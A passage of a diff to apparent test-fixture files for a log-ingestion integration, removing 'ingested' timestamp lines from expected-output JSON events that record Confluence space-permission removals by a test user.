user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6910,7 +6838,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837524627Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.303Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -6998,7 +6925,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837525537Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.295Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7086,7 +7012,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837526742Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.290Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7167,7 +7092,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837527775Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.285Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7255,7 +7179,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837528754Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.282Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7343,7 +7266,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837529679Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.278Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7431,7 +7353,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837530585Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.274Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7512,7 +7433,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837531481Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.270Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7600,7 +7520,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837532385Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.266Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7688,7 +7607,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837533299Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.262Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7776,7 +7694,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837534220Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.258Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7857,7 +7774,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837535225Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.254Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -7945,7 +7861,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837536160Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.250Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8033,7 +7948,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837537087Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.246Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8121,7 +8035,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837538007Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.242Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8202,7 +8115,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837538878Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.238Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8290,7 +8202,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837539895Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.234Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8378,7 +8289,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837540860Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.230Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8466,7 +8376,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837541856Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.225Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8547,7 +8456,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837542875Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.221Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8635,7 +8543,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837544116Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.217Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8723,7 +8630,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837545081Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.212Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8811,7 +8717,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837546086Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.208Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
